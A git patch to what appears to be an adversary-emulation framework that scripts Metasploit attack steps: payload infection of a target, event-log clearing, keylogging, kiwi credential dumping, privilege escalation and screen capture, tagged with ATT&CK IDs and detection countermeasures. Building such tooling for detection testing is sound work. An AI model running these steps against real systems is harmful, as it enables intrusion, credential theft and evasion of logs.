From ac482e8b9e0e5fe8f204734d1102913b1a43345a Mon Sep 17 00:00:00 2001 From: Thorsten Sick Date: Wed, 13 Oct 2021 16:25:46 +0200 Subject: [PATCH] Fixed several issues in metasploit attacks --- app/metasploit.py | 112 ++++++++++++++---- .../metasploit_clearev_t1070.py | 21 ++-- .../metasploit_getsystem.py | 33 +++--- .../metasploit_getuid.py | 4 +- .../metasploit_keylogging.py | 14 +-- .../metasploit_kiwi_t1003.py | 34 +++--- .../metasploit_migrate.py | 13 +- .../metasploit_ps_t1057/metasploit_ps.py | 13 +- .../metasploit_screengrab.py | 23 ++-- .../metasploit_sysinfo.py | 21 ++-- 10 files changed, 164 insertions(+), 124 deletions(-) diff --git a/app/metasploit.py b/app/metasploit.py index 0985ba1..d3a12b0 100644 --- a/app/metasploit.py +++ b/app/metasploit.py @@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil result=res) return res - def clearev(self, target): + def clearev(self, target, **kwargs): """ Clears windows event logs """ command = "clearev" ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. + tactics = "Defense Evasion" + tactics_id = "TA0005" + description = """ +Clear windows event logs to hide tracks + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="clearev", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def screengrab(self, target): + def screengrab(self, target, **kwargs): """ Creates a screenshot Before using it, migrate to a process running while you want to monitor. @@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil command = "screengrab" ttp = "T1113" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Do screen grabbing to collect data on target + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="screengrab", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on(["use espia"], target) print(res) res = self.meterpreter_execute_on([command], target) @@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def keylogging(self, target, monitoring_time): + def keylogging(self, target, monitoring_time, **kwargs): """ Starts keylogging Before using it, migrate to a process running while you want to monitor. @@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil "winlogon.exe" will monitor user logins. "explorer.exe" during the session. @param monitoring_time: Seconds the keylogger is running - @param monitoring_time: The time to monitor the keys. In seconds """ command = "keyscan_start" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Log keys to get passwords and other credentials + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="keylogging", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) time.sleep(monitoring_time) @@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def getuid(self, target): + def getuid(self, target, **kwargs): """ Returns the UID """ command = "getuid" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Get user id + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="getuid", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) + return res[0] - def sysinfo(self, target): + def sysinfo(self, target, **kwargs): """ Returns the sysinfo """ command = "sysinfo" ttp = "T1082" # It uses one out of three different ways to elevate privileges. + tactics = "Discovery" + tactics_id = "TA0007" + description = """ +Get basic system information + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="sysinfo", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res[0] diff --git a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py index 9ef0b5f..f9e1808 100644 --- a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py +++ b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.clearev(target) + self.metasploit.clearev(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py index 8a32fc9..b5de21a 100644 --- a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py +++ b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket @@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, - payload=payload_type, - architecture="x64", - platform="windows", - lhost=ip, - format="exe", - outfile=payload_name) + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 - metasploit.getsystem(target, - variant=self.conf['variant'], - situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", - countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." - ) + self.metasploit.getsystem(target, + variant=self.conf['variant'], + situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", + countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." + ) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py index 3007ccb..d468e0d 100644 --- a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py +++ b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ diff --git a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py index 0907804..2d43011 100644 --- a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py +++ b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, outfile=payload_name, format="exe", architecture="x64") - metasploit.migrate(target, name="winlogon.exe") + self.metasploit.migrate(target, name="winlogon.exe") - metasploit.keylogging(target, monitoring_time=20) + self.metasploit.keylogging(target, monitoring_time=20) return res diff --git a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py index e2bef82..ae15136 100644 --- a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py +++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket @@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, - payload=payload_type, - architecture="x64", - platform="windows", - lhost=ip, - format="exe", - outfile=payload_name) - - metasploit.kiwi(target, - variant=self.conf['variant'], - situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", - countermeasure="Memory access into critical processes should be monitored." - ) + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) + + self.metasploit.kiwi(target, + variant=self.conf['variant'], + situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", + countermeasure="Memory access into critical processes should be monitored." + ) return res diff --git a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py index 7b29679..3e8ea5b 100644 --- a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py +++ b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket @@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, architecture="x64", platform="windows", @@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin): outfile=payload_name ) - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") return res diff --git a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py index bef5798..4c4ae46 100644 --- a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py +++ b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, outfile=payload_name, format="exe", architecture="x64") - metasploit.ps_process_discovery(target) + self.metasploit.ps_process_discovery(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py index a1856e6..8344a21 100644 --- a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py +++ b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") - metasploit.screengrab(target) + self.metasploit.screengrab(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py index 29ff19f..4a00ab8 100644 --- a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - si = metasploit.sysinfo(target) + si = self.metasploit.sysinfo(target) print(f"Sysinfo: {si}") return res